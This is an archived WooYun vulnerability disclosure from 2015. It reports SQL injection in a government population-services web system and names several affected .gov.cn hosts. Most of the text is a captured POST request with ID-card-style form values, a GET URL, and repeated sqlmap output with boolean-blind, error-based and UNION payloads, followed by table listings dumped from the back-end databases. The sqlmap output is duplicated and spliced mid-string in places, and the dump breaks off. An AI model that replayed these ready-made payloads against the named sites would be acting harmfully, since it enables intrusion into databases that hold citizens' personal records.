乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-03-12: 细节已通知厂商并且等待厂商处理中 2015-03-17: 厂商已经确认,细节仅向厂商公开 2015-03-20: 细节向第三方安全合作伙伴开放 2015-05-11: 细节向核心白帽子及相关领域专家公开 2015-05-21: 细节向普通白帽子公开 2015-05-31: 细节向实习白帽子公开 2015-06-15: 细节向公众公开
rt
技术支持:西安网是科技发展有限公司系统全称:人口和计划生育公共服务系统一处get和一处post共两处案例:
http://service.ltpop.gov.cn/Services.shtmlhttp://service.hsrk.gov.cn/Services.shtmlhttp://service.sqjs.gov.cn/Services.shtmlhttp://service.zzxpop.gov.cn/Services.shtmlhttp://service.ltjsj.gov.cn/Services.shtmlhttp://service.zyxpop.gov.cn/Services.shtmlhttp://service.akpop.gov.cn/Services.shtml
举例:
POST /Services/FirstChildDo/76ce8fc5a9545deb/0303/610924104203.shtml HTTP/1.1Host: service.zyxpop.gov.cnProxy-Connection: keep-aliveContent-Length: 781Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://service.zyxpop.gov.cnUser-Agent: Opera/9.80 (Macintosh; Intel Mac OS X; U; en) Presto/2.2.15 Version/10.00Content-Type: application/x-www-form-urlencodedReferer: http://service.zyxpop.gov.cn/Services/FirstChildDo/76ce8fc5a9545deb/0303/610924104203.shtmlAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8Cookie: ASP.NET_SessionId=h1jq01fnvg4loiu5y05uat55__VIEWSTATE=%2FwEPDwUKLTE0Mjg5NTI1MQ9kFgICAxBkZBYCAhEPDxYCHgdWaXNpYmxlZ2QWAgIBDw9kFgQeB29uY2xpY2sFHnJldHVybiBWYWxpZGF0ZU1hcnJ5cygnMDMwMycpOx4Lb25tb3VzZW92ZXIFGHRoaXMuc3R5bGUuY3Vyc29yPSdoYW5kJ2RktGcwBbfslBYCNvGV5fQ1cnTOY%2BE%3D&txtU=FirstChildDo&txtV=76ce8fc5a9545deb&txtW=0303&txtX=610924104203&SearchKeys=+%E5%85%B3%E9%94%AE%E5%AD%97&txtName=%E6%AF%9B%E6%B3%BD%E4%B8%9C&txtIDCard=210905197807210546&txtOriginalArea=%E9%98%BF%E6%96%AF%E9%A1%BF&txtMateName=%E9%98%BF%E6%96%AF%E9%A1%BF&txtMateIDCard=210905197807210546&txtMateOriginalArea=%E9%98%BF%E6%96%AF%E9%A1%BF&txtMarriageStatus=%E6%9C%AA%E5%A9%9A&txtCurrentAddress=%E9%98%BF%E6%96%AF%E9%A1%BF&txtCommTxtA=&pType=0&cbx01=1&cbx01=1&cbx01=1&cbx01=1&cbx01=1&txtCommMemo=&txtContactTel=13800138000&txtContaceMail=&ButApply=&GoBack=
Parameter: txtName (POST)
http://service.zyxpop.gov.cn/userctrl/GetInnerData.aspx?r=0.9662380507215858&FuncNo=8888&oID=610924104000&oNa=4
Parameter: oID (GET)
sqlmap identified the following injection points with a total of 497 HTTP(s) requests:---Parameter: oID (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: r=0.9662380507215858&FuncNo=8888&oID=610924104000' AND 4528=4528 AND 'yNDt'='yNDt&oNa=4 Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: r=0.9662380507215858&FuncNo=8888&oID=610924104000' AND 1046=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(107)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (1046=1046) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(106)+CHAR(107)+CHAR(113))) AND 'nIyL'='nIyL&oNa=4 Type: UNION query Title: Generic UNION query (NULL) - 3 columns Payload: r=0.9662380507215858&FuncNo=8888&oID=610924104000' UNION ALL SELECT CHAR(113)+CHAR(112)+CHAR(107)+CHAR(118)+CHAR(113)+CHAR(86)+CHAR(78)+CHAR(110)+CHAR(73)+CHAR(85)+CHAR(70)+CHAR(72)+CHAR(122)+CHAR(90)+CHAR(111)+CHAR(113)+CHAR(113)+CHAR(106)+CHAR(107)+CHAR(113),NULL,NULL-- &oNa=4---web server operating system: Windows 2008 R2 or 7web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2005sqlmap identified the following injection points with a total of 1244 HTTP(s) requests:---Parameter: txtName (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: __VIEWSTATE=/wEPDwUKLTE0Mjg5NTI1MQ9kFgICAxBkZBYCAhEPDxYCHgdWaXNpYmxlZ2QWAgIBDw9kFgQeB29uY2xpY2sFHnJldHVybiBWYWxpZGF0ZU1hcnJ5cygnMDMwMycpOx4Lb25tb3VzZW92ZXIFGHRoaXMuc3R5bGUuY3Vyc29yPSdoYW5kJ2RktGcwBbfslBYCNvGV5fQ1cnTOY+E=&txtU=FirstChildDo&txtV=76ce8fc5a9545deb&txtW=0303&txtX=610924104203&SearchKeys= %E5%85%B3%E9%94%AE%E5%AD%97&txtName=%E6%AF%9B%E6%B3%BD%E4%B8%9C' AND 9878=9878 AND 'ouoC'='ouoC&txtIDCard=210905197807210546&txtOriginalArea=%E9%98%BF%E6%96%AF%E9%A1%BF&txtMateName=%E9%98%BF%E6%96%AF%E9%A1%BF&txtMateIDCard=210905197807210546&txtMateOriginalArea=%E9%98%BF%E6%96%AF%E9%A1%BF&txtMarriageStatus=%E6%9C%AA%E5%A9%9A&txtCurrentAddress=%E9%98%BF%E6%96%AF%E9%A1%BF&txtCommTxtA=&pType=0&cbx01=1&cbx01=1&cbx01=1&cbx01=1&cbx01=1&txtCommMemo=&txtContactTel=13800138000&txtContaceMail=&ButApply=&GoBack= Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: __VIEWSTATE=/wEPDwUKLTE0Mjg5NTI1MQ9kFgICAxBkZBYCAhEPDxYCHgdWaXNpYmxlZ2QWAgIBDw9kFgQeB29uY2xpY2sFHnJldHVybiBWYWxpZGF0ZU1hcnJ5cygnMDMwMycpOx4Lb25tb3VzZW92ZXIFGHRoaXMuc3R5bGUuY3Vyc29yPSdoYW5kJ2RktGcwBbfslBYCNvGV5fQ1cnTOY+E=&txtU=FirstChildDo&txtV=76ce8fc5a9545deb&txtW=0303&txtX=610924104203&SearchKeys= %E5%85%B3%E9%94%AE%E5%AD%97&txtName=%E6%AF%9B%E6%B3%BD%E4%B8%9C' AND 9777=CONVERT(INT,(SELECT CHAR(113) CHAR(107) CHAR(120) CHAR(118) CHAR(113) (SELECT (CASE WHEN (9777=9777) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(106) CHAR(107) CHAR(98) CHAR(113))) AND 'sBNs'='sBNs&txtIDCard=210905197807210546&txtOriginalArea=%E9%98%BF%E6%96%AF%E9%A1%BF&txtMateName=%E9%98%BF%E6%96%AF%E9%A1%BF&txtMateIDCard=210905197807210546&txtMateOriginalArea=%E9%98%BF%E6%96%AF%E9%A1%BF&txtMarriageStatus=%E6%9C%AA%E5%A9%9A&txtCurrentAddress=%E9%98%BF%E6%96%AF%E9%A1%BF&txtCommTxtA=&pType=0&cbx01=1&cbx01=1&cbx01=1&cbx01=1&cbx01=1&txtCommMemo=&txtContactTel=13800138000&txtContaceMail=&ButApply=&GoBack= Type: UNION query Title: Generic UNION query (43) - 2 columns Payload: __VIEWSTATE=/wEPDwUKLTE0Mjg5NTI1MQ9kFgICAxBkZBYCAhEPDxYCHgdWaXNpYmxlZ2QWAgIBDw9kFgQeB29uY2xpY2sFHnJldHVybiBWYWxpZGF0ZU1hcnJ5cygnMDMwMycpOx4Lb25tb3VzZW92ZXIFGHRoaXMuc3R5bGUuY3Vyc29yPSdoYW5kJ2RktGcwBbfslBYCNvGV5fQ1cnTOY+E=&txtU=FirstChildDo&txtV=76ce8fc5a9545deb&txtW=0303&txtX=610924104203&SearchKeys= %E5%85%B3%E9%94%AE%E5%AD%97&txtName=-9937' UNION ALL SELECT 43,CHAR(113) CHAR(107) CHAR(120) CHAR(118) CHAR(113) CHAR(75) CHAR(76) CHAR(102) CHAR(116) CHAR(108) CHAR(115) CHAR(85) CHAR(80) CHAR(115) CHAR(74) CHAR(113) CHAR(106) CHAR(107) CHAR(98) CHAR(113)-- &txtIDCard=210905197807210546&txtOriginalArea=%E9%98%BF%E6%96%AF%E9%A1%BF&txtMateName=%E9%98%BF%E6%96%AF%E9%A1%BF&txtMateIDCard=210905197807210546&txtMateOriginalArea=%E9%98%BF%E6%96%AF%E9%A1%BF&txtMarriageStatus=%E6%9C%AA%E5%A9%9A&txtCurrentAddress=%E9%98%BF%E6%96%AF%E9%A1%BF&txtCommTxtA=&pType=0&cbx01=1&cbx01=1&cbx01=1&cbx01=1&cbx01=1&txtCommMemo=&txtContactTel=13800138000&txtContaceMail=&ButApply=&GoBack=---web server operating system: Windows 2008 R2 or 7web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2005sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: txtName (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: __VIEWSTATE=/wEPDwUKLTE0Mjg5NTI1MQ9kFgICAxBkZBYCAhEPDxYCHgdWaXNpYmxlZ2QWAgIBDw9kFgQeB29uY2xpY2sFHnJldHVybiBWYWxpZGF0ZU1hcnJ5cygnMDMwMycpOx4Lb25tb3VzZW92ZXIFGHRoaXMuc3R5bGUuY3Vyc29yPSdoYW5kJ2RktGcwBbfslBYCNvGV5fQ1cnTOY+E=&txtU=FirstChildDo&txtV=76ce8fc5a9545deb&txtW=0303&txtX=610924104203&SearchKeys= %E5%85%B3%E9%94%AE%E5%AD%97&txtName=%E6%AF%9B%E6%B3%BD%E4%B8%9C' AND 9878=9878 AND 'ouoC'='ouoC&txtIDCard=210905197807210546&txtOriginalArea=%E9%98%BF%E6%96%AF%E9%A1%BF&txtMateName=%E9%98%BF%E6%96%AF%E9%A1%BF&txtMateIDCard=210905197807210546&txtMateOriginalArea=%E9%98%BF%E6%96%AF%E9%A1%BF&txtMarriageStatus=%E6%9C%AA%E5%A9%9A&txtCurrentAddress=%E9%98%BF%E6%96%AF%E9%A1%BF&txtCommTxtA=&pType=0&cbx01=1&cbx01=1&cbx01=1&cbx01=1&cbx01=1&txtCommMemo=&txtContactTel=13800138000&txtContaceMail=&ButApply=&GoBack= Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: __VIEWSTATE=/wEPDwUKLTE0Mjg5NTI1MQ9kFgICAxBkZBYCAhEPDxYCHgdWaXNpYmxlZ2QWAgIBDw9kFgQeB29uY2xpY2sFHnJldHVybiBWYWxpZGF0ZU1hcnJ5cygnMDMwMycpOx4Lb25tb3VzZW92ZXIFGHRoaXMuc3R5bGUuY3Vyc29yPSdoYW5kJ2RktGcwBbfslBYCNvGV5fQ1cnTOY+E=&txtU=FirstChildDo&txtV=76ce8fc5a9545deb&txtW=0303&txtX=610924104203&SearchKeys= %E5%85%B3%E9%94%AE%E5%AD%97&txtName=%E6%AF%9B%E6%B3%BD%E4%B8%9C' AND 9777=CONVERT(INT,(SELECT CHAR(113) CHAR(107) CHAR(120) CHAR(118) CHAR(113) (SELECT (CASE WHEN (9777=9777) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(106) CHAR(107) CHAR(98) CHAR(113))) AND 'sBNs'='sBNs&txtIDCard=210905197807210546&txtOriginalArea=%E9%98%BF%E6%96%AF%E9%A1%BF&txtMateName=%E9%98%BF%E6%96%AF%E9%A1%BF&txtMateIDCard=210905197807210546&txtMateOriginalArea=%E9%98%BF%E6%96%AF%E9%A1%BF&txtMarriageStatus=%E6%9C%AA%E5%A9%9A&txtCurrentAddress=%E9%98%BF%E6%96%AF%E9%A1%BF&txtCommTxtA=&pType=0&cbx01=1&cbx01=1&cbx01=1&cbx01=1&cbx01=1&txtCommMemo=&txtContactTel=13800138000&txtContaceMail=&ButApply=&GoBack= Type: UNION query Title: Generic UNION query (43) - 2 columns Payload: __VIEWSTATE=/wEPDwUKLTE0Mjg5NTI1MQ9kFgICAxBkZBYCAhEPDxYCHgdWaXNpYmxlZ2QWAgIBDw9kFgQeB29uY2xpY2sFHnJldHVybiBWYWxpZGF0ZU1hcnJ5cygnMDMwMycpOx4Lb25tb3VzZW92ZXIFGHRoaXMuc3R5bGUuY3Vyc29yPSdoYW5kJ2RktGcwBbfslBYCNvGV5fQ1cnTOY+E=&txtU=FirstChildDo&txtV=76ce8fc5a9545deb&txtW=0303&txtX=610924104203&SearchKeys= %E5%85%B3%E9%94%AE%E5%AD%97&txtName=-9937' UNION ALL SELECT 43,CHAR(113) CHAR(107) CHAR(120) CHAR(118) CHAR(113) CHAR(75) CHAR(76) CHAR(102) CHAR(116) CHAR(108) CHAR(115) CHAR(85) CHAR(80) CHAR(115) CHAR(74) CHAR(113) CHAR(106) CHAR(107) CHAR(98) CHAR(113)-- &txtIDCard=210905197807210546&txtOriginalArea=%E9%98%BF%E6%96%AF%E9%A1%BF&txtMateName=%E9%98%BF%E6%96%AF%E9%A1%BF&txtMateIDCard=210905197807210546&txtMateOriginalArea=%E9%98%BF%E6%96%AF%E9%A1%BF&txtMarriageStatus=%E6%9C%AA%E5%A9%9A&txtCurrentAddress=%E9%98%BF%E6%96%AF%E9%A1%BF&txtCommTxtA=&pType=sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: txtName (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: __VIEWSTATE=/wEPDwUKLTE0Mjg5NTI1MQ9kFgICAxBkZBYCAhEPDxYCHgdWaXNpYmxlZ2QWAgIBDw9kFgQeB29uY2xpY2sFHnJldHVybiBWYWxpZGF0ZU1hcnJ5cygnMDMwMycpOx4Lb25tb3VzZW92ZXIFGHRoaXMuc3R5bGUuY3Vyc29yPSdoYW5kJ2RktGcwBbfslBYCNvGV5fQ1cnTOY+E=&txtU=FirstChildDo&txtV=76ce8fc5a9545deb&txtW=0303&txtX=610924104203&SearchKeys= %E5%85%B3%E9%94%AE%E5%AD%97&txtName=%E6%AF%9B%E6%B3%BD%E4%B8%9C' AND 9878=9878 AND 'ouoC'='ouoC&txtIDCard=210905197807210546&txtOriginalArea=%E9%98%BF%E6%96%AF%E9%A1%BF&txtMateName=%E9%98%BF%E6%96%AF%E9%A1%BF&txtMateIDCard=210905197807210546&txtMateOriginalArea=%E9%98%BF%E6%96%AF%E9%A1%BF&txtMarriageStatus=%E6%9C%AA%E5%A9%9A&txtCurrentAddress=%E9%98%BF%E6%96%AF%E9%A1%BF&txtCommTxtA=&pType=0&cbx01=1&cbx01=1&cbx01=1&cbx01=1&cbx01=1&txtCommMemo=&txtContactTel=13800138000&txtContaceMail=&ButApply=&GoBack= Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: __VIEWSTATE=/wEPDwUKLTE0Mjg5NTI1MQ9kFgICAxBkZBYCAhEPDxYCHgdWaXNpYmxlZ2QWAgIBDw9kFgQeB29uY2xpY2sFHnJldHVybiBWYWxpZGF0ZU1hcnJ5cygnMDMwMycpOx4Lb25tb3VzZW92ZXIFGHRoaXMuc3R5bGUuY3Vyc29yPSdoYW5kJ2RktGcwBbfslBYCNvGV5fQ1cnTOY+E=&txtU=FirstChildDo&txtV=76ce8fc5a9545deb&txtW=0303&txtX=610924104203&SearchKeys= %E5%85%B3%E9%94%AE%E5%AD%97&txtName=%E6%AF%9B%E6%B3%BD%E4%B8%9C' AND 9777=CONVERT(INT,(SELECT CHAR(113) CHAR(107) CHAR(120) CHAR(118) CHAR(113) (SELECT (CASE WHEN (9777=9777) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(106) CHAR(107) CHAR(98) CHAR(113))) AND 'sBNs'='sBNs&txtIDCard=210905197807210546&txtOriginalArea=%E9%98%BF%E6%96%AF%E9%A1%BF&txtMateName=%E9%98%BF%E6%96%AF%E9%A1%BF&txtMateIDCard=210905197807210546&txtMateOriginalArea=%E9%98%BF%E6%96%AF%E9%A1%BF&txtMarriageStatus=%E6%9C%AA%E5%A9%9A&txtCurrentAddress=%E9%98%BF%E6%96%AF%E9%A1%BF&txtCommTxtA=&pType=0&cbx01=1&cbx01=1&cbx01=1&cbx01=1&cbx01=1&txtCommMemo=&txtContactTel=13800138000&txtContaceMail=&ButApply=&GoBack= Type: UNION query Title: Generic UNION query (43) - 2 columns Payload: __VIEWSTATE=/wEPDwUKLTE0Mjg5NTI1MQ9kFgICAxBkZBYCAhEPDxYCHgdWaXNpYmxlZ2QWAgIBDw9kFgQeB29uY2xpY2sFHnJldHVybiBWYWxpZGF0ZU1hcnJ5cygnMDMwMycpOx4Lb25tb3VzZW92ZXIFGHRoaXMuc3R5bGUuY3Vyc29yPSdoYW5kJ2RktGcwBbfslBYCNvGV5fQ1cnTOY+E=&txtU=FirstChildDo&txtV=76ce8fc5a9545deb&txtW=0303&txtX=610924104203&SearchKeys= %E5%85%B3%E9%94%AE%E5%AD%97&txtName=-9937' UNION ALL SELECT 43,CHAR(113) CHAR(107) CHAR(120) CHAR(118) CHAR(113) CHAR(75) CHAR(76) CHAR(102) CHAR(116) CHAR(108) CHAR(115) CHAR(85) CHAR(80) CHAR(115) CHAR(74) CHAR(113) CHAR(106) CHAR(107) CHAR(98) CHAR(113)-- &txtIDCard=210905197807210546&txtOriginalArea=%E9%98%BF%E6%96%AF%E9%A1%BF&txtMateName=%E9%98%BF%E6%96%AF%E9%A1%BF&txtMateIDCard=210905197807210546&txtMateOriginalArea=%E9%98%BF%E6%96%AF%E9%A1%BF&txtMarriageStatus=%E6%9C%AA%E5%A9%9A&txtCurrentAddress=%E9%98%BF%E6%96%AF%E9%A1%BF&txtCommTxtA=&pType=0&cbx01=1&cbx01=1&cbx01=1&cbx01=1&cbx01=1&txtCommMemo=&txtContactTel=13800138000&txtContaceMail=&ButApply=&GoBack=---web server operating system: Windows 2008 R2 or 7web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 20050&cbx01=1&cbx01=1&cbx01=1&cbx01=1&cbx01=1&txtCommMemo=&txtContactTel=13800138000&txtContaceMail=&ButApply=&GoBack=---web server operating system: Windows 2008 R2 or 7web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2005Database: ZY_CIEP[41 tables]+---------------------------------------------------+| AreaCN || AreaDetailCN || BAS_EDUKIND || BAS_LivingStatus || BAS_MarraigeType || BAS_NATION || BAS_RPRKIND || BAS_Relation || BAS_SEXKIND || CMS_Class || CMS_Contents || CMS_Critic || CMS_Docs || MsgBoard || MsgBoardReply || PIS_PISTable0 || SYS_Function || SYS_Log || SYS_MsgDocs || SYS_MsgDocs || SYS_Params || SYS_RolesFunction || SYS_RolesFunction || SYS_UserRoles || SiteLink || Sys_QueueBiz || Sys_UnitBiz || USER_BaseInfo || USER_Department || dtproperties || v_CmsContents || v_CmsList || v_MsgBoardList || v_MsgBoardRe || v_PIS || v_QueueBizList || v_SysLogs || v_SysMsg || v_UnitBiz || v_UserList || v_UserRolesPower |+---------------------------------------------------+Database: AK_ZY_PISS[40 tables]+---------------------------------------------------+| AreaCN || AreaDetailCN || AreaNewAKS || CMS_Class || CMS_Contents || CMS_Critic || CMS_Docs || PIS_BaseInfo || PIS_FOLK || PIS_NewbornTmp || PIS_Persons || PIS_QYK || SMSDic || SMSDic || SMSRecv || SYS_Function || SYS_Log || SYS_MsgDocs || SYS_MsgDocs || SYS_Params || SYS_RolesFunction || SYS_RolesFunction || SYS_UserRoles || USER_BaseInfo || USER_Department || UserHD_Directory || UserHD_Files || dtproperties || v_CmsContents || v_CmsList || v_PIS_ForStats || v_PIS_ForStats || v_PisStatsByFunc || v_SysLogs || v_SysMsg || v_UserHD_Directory || v_UserHD_Files || v_UserList || v_UserRolesDire || v_UserRolesPower |+---------------------------------------------------+Database: ZY_OA[59 tables]+---------------------------------------------------+| AreaCN || CMS_Class || CMS_Contents || CMS_Critic || CMS_IncDocs || CMS_ShareUsers || SYS_Function || SYS_Log || SYS_MissionBill || SYS_MissionDocs || SYS_Msg || SYS_Params || SYS_PhotoClass || SYS_Photos || SYS_RolesFunction || SYS_RolesFunction || SYS_UserRoles || SiteLink || USER_AddressList || USER_Archives || USER_Asset || USER_Attend || USER_BaseInfo || USER_Department || USER_PR_List || USER_Schedule || USER_WorkLog || UserHD_Directory || UserHD_Files || WorkFlowLogs || WorkFlowNames || WorkFlowNodes || dtproperties || v_Arrangement || v_CMSAsset || v_CMSContentsDetail || v_CMSContentsDetail || v_CMSContentsImg || v_CMSContentsList || v_CMSCritics || v_CMSPhotos || v_DocsList || v_FilePath || v_MissionBill || v_PR_List || v_ScheduleState || v_SysLogs || v_SysMsg || v_SysPhotoClass || v_SysPhotos || v_UserArchives || v_UserAttend || v_UserHD_Directory || v_UserHD_Files || v_UserList || v_UserRolesPower || v_UserSchedules || v_UserWorkLogs || v_WorkFlows |+---------------------------------------------------+Database: ZY_IBPP[53 tables]+---------------------------------------------------+| AreaCN || AreaDetailCN || BAS_EDUKIND || BAS_LivingStatus || BAS_MarraigeType || BAS_NATION || BAS_RPRKIND || BAS_Relation || BAS_SEXKIND || CMS_Class || CMS_Contents || CMS_Critic || CMS_Docs || Config_Rpt_CreateRptFiles || Config_Rpt_Design || Config_Rpt_PivotTable_List || Config_Rpt_PivotTable_Queue || Config_Rpt_Queue || Config_Rpt_SetCreate || Config_Rpt_Template || MsgBoard || MsgBoardReply || PIS_PISTable0 || PIS_RptData || PIS_RptIndex || SYS_Clients || SYS_Function || SYS_Log || SYS_Msg || SYS_Params || SYS_RolesFunction || SYS_RolesFunction || SYS_UserRoles || Sys_UnitBiz || USER_BaseInfo || USER_Department || dtproperties || v_CmsContents || v_CmsList || v_MsgBoardList || v_MsgBoardRe || v_PIS_DynamicInfo || v_PIS_DynamicInfo || v_QueueBizList || v_ReportDataHasRows || v_ReportFull || v_ReportIndex || v_ReportQuery || v_SysLogs || v_SysMsg || v_UnitBiz || v_UserList || v_UserRolesPower |+---------------------------------------------------+Database: msdb[92 tables]+---------------------------------------------------+| MSdatatype_mappings || MSdbms_datatype_mapping || MSdbms_datatype_mapping || MSdbms_datatype_mapping || MSdbms_map || backupfilegroup || backupfilegroup || backupmediafamily || backupmediaset || backupset || log_shipping_monitor_alert || log_shipping_monitor_error_detail || log_shipping_monitor_history_detail || log_shipping_monitor_primary || log_shipping_monitor_secondary || log_shipping_primaries || log_shipping_primary_databases || log_shipping_primary_secondaries || log_shipping_secondaries || log_shipping_secondary_databases || log_shipping_secondary_databases || logmarkhistory || restorefilegroup || restorefilegroup || restorehistory || sqlagent_info || suspect_pages || sysalerts || syscachedcredentials || syscategories || sysdatatypemappings || sysdbmaintplan_databases || sysdbmaintplan_history || sysdbmaintplan_jobs || sysdbmaintplans || sysdownloadlist || sysdtscategories || sysdtslog90 || sysdtspackagefolders90 || sysdtspackagelog || sysdtspackages90 || sysdtspackages90 || sysdtssteplog || sysdtstasklog || sysjobactivity || sysjobhistory || sysjobs_view || sysjobs_view || sysjobschedules || sysjobservers || sysjobstepslogs || sysjobstepslogs || sysmail_account || sysmail_allitems || sysmail_attachments_transfer || sysmail_attachments_transfer || sysmail_configuration || sysmail_event_log || sysmail_faileditems || sysmail_log || sysmail_mailattachments || sysmail_mailitems || sysmail_principalprofile || sysmail_profileaccount || sysmail_profileaccount || sysmail_query_transfer || sysmail_send_retries || sysmail_sentitems || sysmail_server || sysmail_servertype || sysmail_unsentitems || sysmaintplan_logdetail || sysmaintplan_logdetail || sysmaintplan_plans || sysmaintplan_subplans || sysnotifications || sysoperators || sysoriginatingservers_view || sysoriginatingservers_view || sysproxies || sysproxylogin || sysproxyloginsubsystem_view || sysproxysubsystem || sysschedules_localserver_view || sysschedules_localserver_view || syssessions || syssubsystems || systargetservergroupmembers || systargetservergroups || systargetservers_view || systargetservers_view || systaskids |+---------------------------------------------------+Database: ZY_ThirdExam[73 tables]+---------------------------------------------------+| AreaCN || CMS_Class || CMS_Contents || CMS_Critic || CMS_IncDocs || CMS_ShareUsers || EXAM_BaseInfo || EXAM_Details || SYS_AssetsOut || SYS_AssetsOut || SYS_Customer_PR || SYS_Customer_PR || SYS_Function || SYS_Log || SYS_MissionDocs || SYS_MissionDocs || SYS_MissionDocs || SYS_Msg || SYS_Params || SYS_PhotoClass || SYS_Photos || SYS_RolesFunction || SYS_RolesFunction || SYS_UserRoles || SiteLink || USER_AddressList || USER_Archives || USER_Attend || USER_AttendSet || USER_BaseInfo || USER_Department || USER_Schedule || USER_WorkLog || USER_WorkLogView || UserHD_Directory || UserHD_Files || WorkFlowLogs || WorkFlowNames || WorkFlowNodes || dtproperties || v_Arrangement || v_AssetsOut || v_CMSAsset || v_CMSContentsDetail || v_CMSContentsDetail || v_CMSContentsImg || v_CMSContentsList || v_CMSCritics || v_CMSPhotos || v_CustomerInfo || v_DocsList || v_ExamBaseInfo || v_ExamInfo || v_FilePath || v_MissionDo || v_Missions || v_PR_List || v_ScheduleState || v_SysLogs || v_SysMsg || v_SysPhotoClass || v_SysPhotos || v_UserArchives || v_UserAttend || v_UserHD_Directory || v_UserHD_Files || v_UserList || v_UserRolesPower || v_UserRolesPower || v_UserSchedules || v_UserWorkLogs || v_WorkFlows || v_WorkLogViewUser |+---------------------------------------------------+Database: master[291 tables]+---------------------------------------------------+| INFORMATION_SCHEMA.CHECK_CONSTRAINTS || INFORMATION_SCHEMA.COLUMNS || INFORMATION_SCHEMA.COLUMN_DOMAIN_USAGE || INFORMATION_SCHEMA.COLUMN_PRIVILEGES || INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE || INFORMATION_SCHEMA.CONSTRAINT_TABLE_USAGE || INFORMATION_SCHEMA.DOMAINS || INFORMATION_SCHEMA.DOMAIN_CONSTRAINTS || INFORMATION_SCHEMA.KEY_COLUMN_USAGE || INFORMATION_SCHEMA.PARAMETERS || INFORMATION_SCHEMA.REFERENTIAL_CONSTRAINTS || INFORMATION_SCHEMA.ROUTINES || INFORMATION_SCHEMA.ROUTINE_COLUMNS || INFORMATION_SCHEMA.SCHEMATA || INFORMATION_SCHEMA.TABLES || INFORMATION_SCHEMA.TABLE_CONSTRAINTS || INFORMATION_SCHEMA.TABLE_PRIVILEGES || INFORMATION_SCHEMA.VIEWS || INFORMATION_SCHEMA.VIEW_COLUMN_USAGE || INFORMATION_SCHEMA.VIEW_TABLE_USAGE || MSreplication_options || SYS_MsgDocs || spt_fallback_db || spt_fallback_dev || spt_fallback_usg || spt_monitor || spt_values || sys.all_columns || sys.all_objects || sys.all_parameters || sys.all_sql_modules || sys.all_views || sys.allocation_units || sys.assemblies || sys.assembly_files || sys.assembly_modules || sys.assembly_references || sys.assembly_types || sys.asymmetric_keys || sys.backup_devices || sys.certificates || sys.check_constraints || sys.column_type_usages || sys.column_xml_schema_collection_usages || sys.columns || sys.computed_columns || sys.configurations || sys.conversation_endpoints || sys.conversation_groups || sys.credentials || sys.crypt_properties || sys.data_spaces || sys.database_files || sys.database_mirroring_endpoints || sys.database_mirroring_endpoints || sys.database_mirroring_witnesses || sys.database_permissions || sys.database_principal_aliases || sys.database_principals || sys.database_recovery_status || sys.database_role_members || sys.databases || sys.default_constraints || sys.destination_data_spaces || sys.dm_broker_activated_tasks || sys.dm_broker_connections || sys.dm_broker_forwarded_messages || sys.dm_broker_queue_monitors || sys.dm_clr_appdomains || sys.dm_clr_loaded_assemblies || sys.dm_clr_properties || sys.dm_clr_tasks || sys.dm_db_file_space_usage || sys.dm_db_index_usage_stats || sys.dm_db_mirroring_connections || sys.dm_db_missing_index_details || sys.dm_db_missing_index_group_stats || sys.dm_db_missing_index_groups || sys.dm_db_partition_stats || sys.dm_db_session_space_usage || sys.dm_db_task_space_usage || sys.dm_exec_background_job_queue_stats || sys.dm_exec_background_job_queue_stats || sys.dm_exec_cached_plans || sys.dm_exec_connections || sys.dm_exec_query_optimizer_info || sys.dm_exec_query_stats || sys.dm_exec_query_transformation_stats || sys.dm_exec_requests || sys.dm_exec_sessions || sys.dm_fts_active_catalogs || sys.dm_fts_index_population || sys.dm_fts_memory_buffers || sys.dm_fts_memory_pools || sys.dm_fts_population_ranges || sys.dm_io_backup_tapes || sys.dm_io_cluster_shared_drives || sys.dm_io_pending_io_requests || sys.dm_os_buffer_descriptors || sys.dm_os_child_instances || sys.dm_os_cluster_nodes || sys.dm_os_hosts || sys.dm_os_latch_stats || sys.dm_os_loaded_modules || sys.dm_os_memory_allocations || sys.dm_os_memory_cache_clock_hands || sys.dm_os_memory_cache_counters || sys.dm_os_memory_cache_entries || sys.dm_os_memory_cache_hash_tables || sys.dm_os_memory_clerks || sys.dm_os_memory_objects || sys.dm_os_memory_pools || sys.dm_os_performance_counters || sys.dm_os_ring_buffers || sys.dm_os_schedulers || sys.dm_os_stacks || sys.dm_os_sublatches || sys.dm_os_sys_info || sys.dm_os_tasks || sys.dm_os_threads || sys.dm_os_virtual_address_dump || sys.dm_os_wait_stats || sys.dm_os_waiting_tasks || sys.dm_os_worker_local_storage || sys.dm_os_workers || sys.dm_qn_subscriptions || sys.dm_repl_articles || sys.dm_repl_schemas || sys.dm_repl_tranhash || sys.dm_repl_traninfo || sys.dm_tran_active_snapshot_database_transactions || sys.dm_tran_active_transactions || sys.dm_tran_current_snapshot || sys.dm_tran_current_transaction || sys.dm_tran_database_transactions || 